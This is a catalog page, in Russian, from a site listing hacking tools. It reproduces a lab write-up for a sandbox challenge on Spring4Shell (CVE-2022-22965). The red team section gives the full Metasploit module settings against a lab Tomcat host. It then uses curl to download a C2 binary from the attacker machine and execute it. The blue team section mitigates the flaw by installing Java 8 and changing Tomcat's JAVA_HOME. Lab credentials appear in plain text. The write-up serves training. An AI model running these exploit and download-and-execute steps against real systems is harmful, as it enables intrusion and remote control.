Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Sandbox-Challenge-Spring4Shell-CVE-2022-22965- — Пошаговое руководство по эксплуатации CVE-2022-22965 (Spring4Shell) с помощью Metasploit, развертыванию C2-слушателя и смягчению уязвимости путем понижения версии до Java 8 на сервере Tomcat. | Kitploit
Инструменты/GitHubGitHub/felisha-elmer/sandbox-challenge-spring4shell-cve-2022-22965-
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed TeamingЛаборатории и Практика
GitHubfelisha-elmer/sandbox-challenge-spring4shell-cve-2022-22965-

Sandbox-Challenge-Spring4Shell-CVE-2022-22965-

Пошаговое руководство по эксплуатации CVE-2022-22965 (Spring4Shell) с помощью Metasploit, развертыванию C2-слушателя и смягчению уязвимости путем понижения версии до Java 8 на сервере Tomcat.

Репозиторий
163 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Песочница уязвимости Spring4Shell (CVE-2022-22965)

Обзор

Это пошаговое руководство описывает выполнение задания песочницы, посвящённого CVE-2022-22965, известной как Spring4Shell — критической (CVSS 9.8/10) уязвимости удалённого выполнения кода, затрагивающей определённые версии фреймворка Spring для Java. Задание охватывает как атакующую (red team), так и защитную (blue team) перспективу данной уязвимости.

Примечание: Команды и пути к файлам в этом руководстве соответствуют конкретной среде, использованной при выполнении. Ваша среда может отличаться — корректируйте пути, IP-адреса и имена файлов соответствующим образом.


Среда

МашинаIP-адресРоль
Security-Desk (Kali Linux)172.16.200.12Машина для атаки и работы
Red Target (Linux)172.16.100.90Цель для эксплуатации
Blue Target (Linux)172.16.100.100Цель для усиления защиты

Учётные данные: playerone / password123


Задача Red Team: Развернуть C2-прослушиватель на Red Target

Шаг 1 — Определение цели

Просмотрел вкладку Network Map на панели задания, чтобы подтвердить IP-адрес Red Target (172.16.100.90). Использовал curl для проверки веб-приложения, работающего на порту 80:

root@kitploit:~
curl http://172.16.100.90

Вывод показал Apache Tomcat 9.0.59 с перенаправлением на /dasmsp. Просмотрел исходный код страницы, чтобы определить конечную точку POST-формы по адресу /dasmsp/contact.

Шаг 2 — Запуск Metasploit и настройка эксплойта

root@kitploit:~
msfconsole
root@kitploit:~
use exploit/multi/http/spring_framework_rce_spring4shell
set RHOSTS 172.16.100.90
set LHOST 172.16.200.12
set RPORT 80
set TARGETURI /dasmsp/contact
set PAYLOAD_PATH webapps/ROOT
set HTTP_METHOD POST
set ForceExploit true
run

Эксплойт успешно создал JSP-шелл, изменил загрузчик классов, сбросил файл журнала и открыл сессию командной оболочки на Red Target.

Шаг 3 — Получение интерактивной оболочки

После открытия сессии ввёл shell, чтобы перейти к интерактивной оболочке. Metasploit нашёл /usr/bin/script на цели и использовал его для получения интерактивной оболочки от имени пользователя tomcat.

Шаг 4 — Передача и выполнение deploy_c2

Бинарный файл deploy_c2 находился на Security-Desk, а не на Red Target. Разместил его на Security-Desk через HTTP-сервер Python3:

root@kitploit:~
cd /home/playerone/Desktop/Resources/
python3 -m http.server 8080

Загрузил и выполнил его в сессии оболочки Red Target:

root@kitploit:~
curl http://172.16.200.12:8080/deploy_c2 -o /tmp/deploy_c2
chmod +x /tmp/deploy_c2
/tmp/deploy_c2

Вывод подтвердил: Done! — C2-прослушиватель успешно развёрнут на Red Target.


Задача Blue Team: Смягчение CVE-2022-22965 на Blue Target (переход на Java 8)

Шаг 1 — Подключение по SSH к Blue Target

Из терминала Security-Desk:

root@kitploit:~
ssh [email protected]

Пароль: password123

Шаг 2 — Передача пакетов Java 8 на Blue Target

Пакеты Java 8 .deb находились на Security-Desk по пути /home/playerone/Desktop/Resources/. Передал их на Blue Target с помощью SCP из терминала Security-Desk:

root@kitploit:~
scp /home/playerone/Desktop/Resources/*.deb [email protected]:/tmp/

Переданные пакеты:

  • adoptium-ca-certificates_1.0.2-1_all.deb
  • fonts-dejavu_2.37-6_all.deb
  • p11-kit-modules_0.24.1-2_amd64.deb
  • p11-kit_0.24.1-2_amd64.deb
  • temurin-8-jdk_8.0.402.0.0+6_amd64.deb

Шаг 3 — Установка пакетов Java 8

В сессии SSH на Blue Target:

root@kitploit:~
sudo dpkg -i /tmp/*.deb

Шаг 4 — Установка Java 8 в качестве версии по умолчанию (обход известной проблемы)

Из-за известной проблемы в задании проверка не регистрируется корректно без ручной установки Java 8 по умолчанию:

root@kitploit:~
sudo update-alternatives --config java

Выбрал вариант 2 — /usr/lib/jvm/temurin-8-jdk-amd64/bin/java.

Шаг 5 — Обновление службы Tomcat для использования Java 8

Просмотрел файл unit-службы Tomcat:

root@kitploit:~
cat /etc/systemd/system/tomcat.service

Отредактировал файл, чтобы обновить переменную окружения JAVA_HOME:

root@kitploit:~
sudo nano /etc/systemd/system/tomcat.service

Изменил:

root@kitploit:~
Environment="JAVA_HOME=/usr"

На:

root@kitploit:~
Environment="JAVA_HOME=/usr/lib/jvm/temurin-8-jdk-amd64"

Шаг 6 — Перезагрузка и перезапуск Tomcat

root@kitploit:~
sudo systemctl daemon-reload
sudo systemctl restart tomcat

Проверка «CVE-2022-22965 Mitigated on Blue Target» загорелась зелёным на панели задания.


Используемые инструменты

  • Metasploit Framework (модуль spring_framework_rce_spring4shell)
  • curl
  • HTTP-сервер Python3
  • SSH / SCP
  • dpkg
  • systemctl
  • update-alternatives
  • nano
Скачать инструмент